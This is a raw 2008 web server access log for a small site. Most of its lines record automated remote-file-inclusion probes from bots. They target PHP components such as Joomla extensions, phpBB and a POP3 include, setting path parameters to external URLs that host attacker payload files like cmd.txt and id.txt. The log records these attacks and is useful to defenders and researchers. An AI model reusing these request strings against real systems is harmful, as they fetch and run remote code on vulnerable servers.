213.203.223.93 - - [17/Feb/2008:17:18:24 -0800] "GET /logs/access_080107.log/send_reminders.php?includedir=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.toulouseangloexchange.com"
213.203.223.93 - - [17/Feb/2008:17:18:24 -0800] "GET /logs/access_080107.log/errors.php?error=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.toulouseangloexchange.com"
87.106.222.188 - - [17/Feb/2008:17:19:39 -0800] "GET /logs/skin/zero_vote/login.php?dir=http://www.soh-freedomforce.de/components/com_simpleboard/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.toulouseangloexchange.com"
87.106.222.188 - - [17/Feb/2008:17:19:39 -0800] "GET /skin/zero_vote/login.php?dir=http://www.soh-freedomforce.de/components/com_simpleboard/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.toulouseangloexchange.com"
84.234.71.230 - - [17/Feb/2008:17:20:05 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
208.226.79.133 - - [17/Feb/2008:17:22:23 -0800] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://statesidelogistics.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
208.226.79.133 - - [17/Feb/2008:17:22:23 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://statesidelogistics.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
208.226.79.133 - - [17/Feb/2008:17:22:23 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://statesidelogistics.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
205.234.242.100 - - [17/Feb/2008:17:22:49 -0800] "GET /logs/access_071112.log//skin/zero_vote/error.php?dir=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
205.234.242.100 - - [17/Feb/2008:17:22:49 -0800] "GET //skin/zero_vote/error.php?dir=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
205.234.242.100 - - [17/Feb/2008:17:22:49 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
12.10.250.90 - - [17/Feb/2008:17:23:04 -0800] "GET //index.php?body=http://www.tangobuy.com/components/spscanid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
74.6.8.118 - - [17/Feb/2008:17:25:45 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
74.6.8.118 - - [17/Feb/2008:17:25:46 -0800] "GET /?M=A HTTP/1.0" 200 903 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
67.195.44.107 - - [17/Feb/2008:17:25:51 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
67.195.44.82 - - [17/Feb/2008:17:25:52 -0800] "GET /logs/access.log HTTP/1.0" 200 53177 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
205.234.242.100 - - [17/Feb/2008:17:26:23 -0800] "GET /logs/access_071105.log//skin/zero_vote/error.php?dir=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
58.26.137.64 - - [17/Feb/2008:17:26:56 -0800] "GET //modules/Forums/admin/admin_styles.php?phpbb_root_path=http://jaspo41.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.toulouseangloexchange.com"
58.26.137.64 - - [17/Feb/2008:17:26:56 -0800] "GET /logs//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://jaspo41.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.toulouseangloexchange.com"
63.195.191.15 - - [17/Feb/2008:17:27:23 -0800] "GET /logs/access_071112.log//skin/zero_vote/error.php?dir=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
63.195.191.15 - - [17/Feb/2008:17:27:23 -0800] "GET //skin/zero_vote/error.php?dir=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
63.195.191.15 - - [17/Feb/2008:17:27:24 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
213.203.223.93 - - [17/Feb/2008:17:29:08 -0800] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.toulouseangloexchange.com"
213.203.223.93 - - [17/Feb/2008:17:29:08 -0800] "GET /logs/access.log/errors.php?error=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.toulouseangloexchange.com"
213.203.223.93 - - [17/Feb/2008:17:29:08 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.toulouseangloexchange.com"
213.203.223.93 - - [17/Feb/2008:17:29:09 -0800] "GET /errors.php?error=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.toulouseangloexchange.com"
213.203.223.93 - - [17/Feb/2008:17:29:09 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.toulouseangloexchange.com"
213.203.223.93 - - [17/Feb/2008:17:29:09 -0800] "GET /logs/errors.php?error=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.toulouseangloexchange.com"
208.226.79.133 - - [17/Feb/2008:17:29:14 -0800] "GET /logs/access_080121.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://statesidelogistics.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
210.245.164.10 - - [17/Feb/2008:17:29:22 -0800] "GET /logs/scripts.log/index.php3?s=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
210.245.164.10 - - [17/Feb/2008:17:29:23 -0800] "GET /index.php3?s=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
210.245.164.10 - - [17/Feb/2008:17:29:23 -0800] "GET /logs/index.php3?s=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
210.245.164.10 - - [17/Feb/2008:17:30:27 -0800] "GET /logs/access_071203.log/index.php3?s=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
63.195.191.15 - - [17/Feb/2008:17:31:19 -0800] "GET /logs/access_071105.log//skin/zero_vote/error.php?dir=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
211.218.149.119 - - [17/Feb/2008:17:33:21 -0800] "GET /logs/%3Cwbr%20/%3Eaccess.log//admin/business_inc/saveserver.php?thisdir=http://www.burgnarren-waldburg.de/modules/xoopsgallery/platform/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.toulouseangloexchange.com"
216.67.238.88 - - [17/Feb/2008:17:33:21 -0800] "GET //login.php?dir=http://140.128.187.8/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
211.218.149.119 - - [17/Feb/2008:17:33:21 -0800] "GET //admin/business_inc/saveserver.php?thisdir=http://www.burgnarren-waldburg.de/modules/xoopsgallery/platform/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.toulouseangloexchange.com"
211.218.149.119 - - [17/Feb/2008:17:33:21 -0800] "GET /logs/%3Cwbr%20//admin/business_inc/saveserver.php?thisdir=http://www.burgnarren-waldburg.de/modules/xoopsgallery/platform/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.toulouseangloexchange.com"
211.218.149.119 - - [17/Feb/2008:17:33:43 -0800] "GET //admin/business_inc/saveserver.php?thisdir=http://www.burgnarren-waldburg.de/modules/xoopsgallery/platform/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.toulouseangloexchange.com"
217.22.60.11 - - [17/Feb/2008:17:34:46 -0800] "GET /config.inc.php?path_escape=http://www.demens.be/images/upload/plekih/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
208.226.79.133 - - [17/Feb/2008:17:35:26 -0800] "GET /logs/access_080127.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://statesidelogistics.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
208.226.79.133 - - [17/Feb/2008:17:35:26 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://statesidelogistics.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
208.226.79.133 - - [17/Feb/2008:17:35:26 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://statesidelogistics.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
84.234.71.230 - - [17/Feb/2008:17:36:26 -0800] "GET //login.php?dir=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
209.160.42.74 - - [17/Feb/2008:17:43:01 -0800] "GET /logs/includes/login.php?_SESSION[docroot_path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
209.160.42.74 - - [17/Feb/2008:17:43:01 -0800] "GET /includes/login.php?_SESSION[docroot_path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.13.222.135 - - [17/Feb/2008:17:44:35 -0800] "GET /logs/access_080127.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
64.13.222.135 - - [17/Feb/2008:17:44:36 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
64.13.222.135 - - [17/Feb/2008:17:44:36 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
210.245.164.10 - - [17/Feb/2008:17:46:56 -0800] "GET /logs/access_080114.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
210.245.164.10 - - [17/Feb/2008:17:46:57 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
210.245.164.10 - - [17/Feb/2008:17:46:57 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
84.234.71.230 - - [17/Feb/2008:17:47:49 -0800] "GET /logs/access_080127.log//login.php?dir=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
84.234.71.230 - - [17/Feb/2008:17:47:49 -0800] "GET /logs//login.php?dir=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
64.13.222.135 - - [17/Feb/2008:17:48:22 -0800] "GET /logs/access_071217.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
84.234.71.230 - - [17/Feb/2008:17:49:51 -0800] "GET /logs/access_071119.log//login.php?dir=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
216.67.238.88 - - [17/Feb/2008:17:50:05 -0800] "GET /logs/access_080127.log//login.php?dir=http://140.128.187.8/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.67.238.88 - - [17/Feb/2008:17:50:05 -0800] "GET /logs//login.php?dir=http://140.128.187.8/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
62.193.225.91 - - [17/Feb/2008:17:50:50 -0800] "GET //login.php?dir=http://140.128.187.8/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
216.67.238.88 - - [17/Feb/2008:17:50:59 -0800] "GET /index.php?body=http://140.128.187.8/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
62.193.225.91 - - [17/Feb/2008:17:51:31 -0800] "GET //login.php?dir=http://140.128.187.8/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
210.245.164.10 - - [17/Feb/2008:17:52:57 -0800] "GET /logs/access_071126.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
66.194.79.1 - - [17/Feb/2008:17:53:16 -0800] "GET //login.php?dir=http://140.128.187.8/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.194.79.1 - - [17/Feb/2008:17:53:52 -0800] "GET //login.php?dir=http://140.128.187.8/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
87.117.225.155 - - [17/Feb/2008:17:54:29 -0800] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.algebramovie.com/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.toulouseangloexchange.com"
87.117.225.155 - - [17/Feb/2008:17:54:29 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.algebramovie.com/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.toulouseangloexchange.com"
216.67.238.88 - - [17/Feb/2008:17:57:10 -0800] "GET /logs/access_071119.log//login.php?dir=http://140.128.187.8/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
222.135.109.228 - - [17/Feb/2008:18:00:00 -0800] "GET /logs/access_071217.log//ask_password.php?dir=http://ecology.275mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
12.10.250.90 - - [17/Feb/2008:18:00:40 -0800] "GET /logs/access_071022.log//index.php?body=http://www.tangobuy.com/components/spscanid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
12.10.250.90 - - [17/Feb/2008:18:00:40 -0800] "GET /logs//index.php?body=http://www.tangobuy.com/components/spscanid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
12.10.250.90 - - [17/Feb/2008:18:01:20 -0800] "GET /logs/access_071105.log//index.php?body=http://www.tangobuy.com/components/spscanid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
82.134.6.30 - - [17/Feb/2008:18:02:59 -0800] "GET /logs/access_080114.log/admin.php?include_path=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
82.134.6.30 - - [17/Feb/2008:18:02:59 -0800] "GET /admin.php?include_path=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
82.134.6.30 - - [17/Feb/2008:18:02:59 -0800] "GET /logs/admin.php?include_path=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
67.15.190.12 - - [17/Feb/2008:18:03:16 -0800] "GET /logs/access_080114.log/admin.php?include_path=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
67.15.190.12 - - [17/Feb/2008:18:03:16 -0800] "GET /admin.php?include_path=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
67.15.190.12 - - [17/Feb/2008:18:03:18 -0800] "GET /logs/admin.php?include_path=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
202.75.35.162 - - [17/Feb/2008:18:04:05 -0800] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.algebramovie.com/images/test.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.toulouseangloexchange.com"
202.75.35.162 - - [17/Feb/2008:18:04:05 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.algebramovie.com/images/test.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.toulouseangloexchange.com"
67.15.190.12 - - [17/Feb/2008:18:05:20 -0800] "GET /logs/access_080114.log/?GALLERY_BASEDIR=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
67.15.190.12 - - [17/Feb/2008:18:05:20 -0800] "GET /?GALLERY_BASEDIR=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 200 919 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
67.15.190.12 - - [17/Feb/2008:18:05:20 -0800] "GET /logs/?GALLERY_BASEDIR=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 200 3655 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
67.15.190.12 - - [17/Feb/2008:18:05:28 -0800] "GET /logs/access_071126.log/admin.php?include_path=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
67.15.190.12 - - [17/Feb/2008:18:05:33 -0800] "GET /logs/access.log/?GALLERY_BASEDIR=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
210.245.164.10 - - [17/Feb/2008:18:07:05 -0800] "GET /logs/access_071210.log/lang.php?subpage=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
210.245.164.10 - - [17/Feb/2008:18:07:06 -0800] "GET /lang.php?subpage=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
210.245.164.10 - - [17/Feb/2008:18:07:06 -0800] "GET /logs/lang.php?subpage=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
82.134.6.30 - - [17/Feb/2008:18:09:06 -0800] "GET /logs/access_080114.log/?GALLERY_BASEDIR=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
82.134.6.30 - - [17/Feb/2008:18:09:06 -0800] "GET /?GALLERY_BASEDIR=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 200 919 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
82.134.6.30 - - [17/Feb/2008:18:09:07 -0800] "GET /logs/?GALLERY_BASEDIR=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 200 3655 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
82.134.6.30 - - [17/Feb/2008:18:10:07 -0800] "GET /logs/access.log/?GALLERY_BASEDIR=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
66.194.79.1 - - [17/Feb/2008:18:10:33 -0800] "GET /logs/access_080127.log//login.php?dir=http://140.128.187.8/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.194.79.1 - - [17/Feb/2008:18:10:33 -0800] "GET /logs//login.php?dir=http://140.128.187.8/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.194.79.1 - - [17/Feb/2008:18:10:39 -0800] "GET /logs/access_080127.log//login.php?dir=http://140.128.187.8/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.194.79.1 - - [17/Feb/2008:18:10:39 -0800] "GET /logs//login.php?dir=http://140.128.187.8/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
82.134.6.30 - - [17/Feb/2008:18:12:45 -0800] "GET /logs/access_071119.log/admin.php?include_path=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
84.234.71.230 - - [17/Feb/2008:18:14:41 -0800] "GET /logs/access_080204.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
84.234.71.230 - - [17/Feb/2008:18:14:42 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
84.234.71.230 - - [17/Feb/2008:18:17:10 -0800] "GET /logs/access.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
66.194.79.1 - - [17/Feb/2008:18:18:14 -0800] "GET /logs/access_071119.log//login.php?dir=http://140.128.187.8/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.194.79.1 - - [17/Feb/2008:18:18:14 -0800] "GET /logs/access_071119.log//login.php?dir=http://140.128.187.8/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
195.234.108.168 - - [17/Feb/2008:18:20:42 -0800] "GET /administrator/components/com_performs/lib/lib_template.php?mosConfig_absolute_path=http://www.smagz.com/jim.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.toulouseangloexchange.com"
195.234.108.168 - - [17/Feb/2008:18:20:42 -0800] "GET /logs/administrator/components/com_performs/lib/lib_template.php?mosConfig_absolute_path=http://www.smagz.com/jim.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.toulouseangloexchange.com"
66.87.86.218 - - [17/Feb/2008:18:21:13 -0800] "GET / HTTP/1.1" 200 919 "http://www.interpra-link.com/expat/digiExpatNiv2.php3?id_secteur=11&id_rubrique=71&id_parent=70" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.toulouseangloexchange.com"
66.87.86.218 - - [17/Feb/2008:18:21:14 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.toulouseangloexchange.com"
66.87.86.218 - - [17/Feb/2008:18:21:18 -0800] "GET / HTTP/1.1" 200 919 "http://www.toulouseangloexchange.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.toulouseangloexchange.com"
66.87.86.218 - - [17/Feb/2008:18:21:22 -0800] "GET / HTTP/1.1" 200 919 "http://www.toulouseangloexchange.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.toulouseangloexchange.com"
66.87.86.218 - - [17/Feb/2008:18:21:28 -0800] "GET / HTTP/1.1" 200 919 "http://www.toulouseangloexchange.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.toulouseangloexchange.com"
209.31.183.74 - - [17/Feb/2008:18:23:17 -0800] "GET /logs/access_080127.log//?mosConfig_absolute_path=http://notice.se/homepage/images/sida6_4.gif?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
209.31.183.74 - - [17/Feb/2008:18:23:17 -0800] "GET //?mosConfig_absolute_path=http://notice.se/homepage/images/sida6_4.gif?????????????????????????????? HTTP/1.1" 200 919 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
209.31.183.74 - - [17/Feb/2008:18:23:17 -0800] "GET /logs//?mosConfig_absolute_path=http://notice.se/homepage/images/sida6_4.gif?????????????????????????????? HTTP/1.1" 200 3660 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
209.31.183.74 - - [17/Feb/2008:18:24:14 -0800] "GET /logs/access_071224.log//?mosConfig_absolute_path=http://notice.se/homepage/images/sida6_4.gif?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
67.18.106.122 - - [17/Feb/2008:18:27:51 -0800] "GET /logs//?mosConfig_absolute_path=http://germanyhost.de/contenido/external/wysiwyg/tinymce/jscripts/tiny_mce/plugins/preview/langs/.up/phpmic.txt.txt? HTTP/1.1" 200 3660 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.toulouseangloexchange.com"
67.18.106.122 - - [17/Feb/2008:18:27:52 -0800] "GET //?mosConfig_absolute_path=http://germanyhost.de/contenido/external/wysiwyg/tinymce/jscripts/tiny_mce/plugins/preview/langs/.up/phpmic.txt.txt? HTTP/1.1" 200 919 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.toulouseangloexchange.com"
213.203.223.93 - - [17/Feb/2008:18:29:40 -0800] "GET /logs/access_080107.log//components/com_forum/download.php?phpbb_root_path=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.toulouseangloexchange.com"
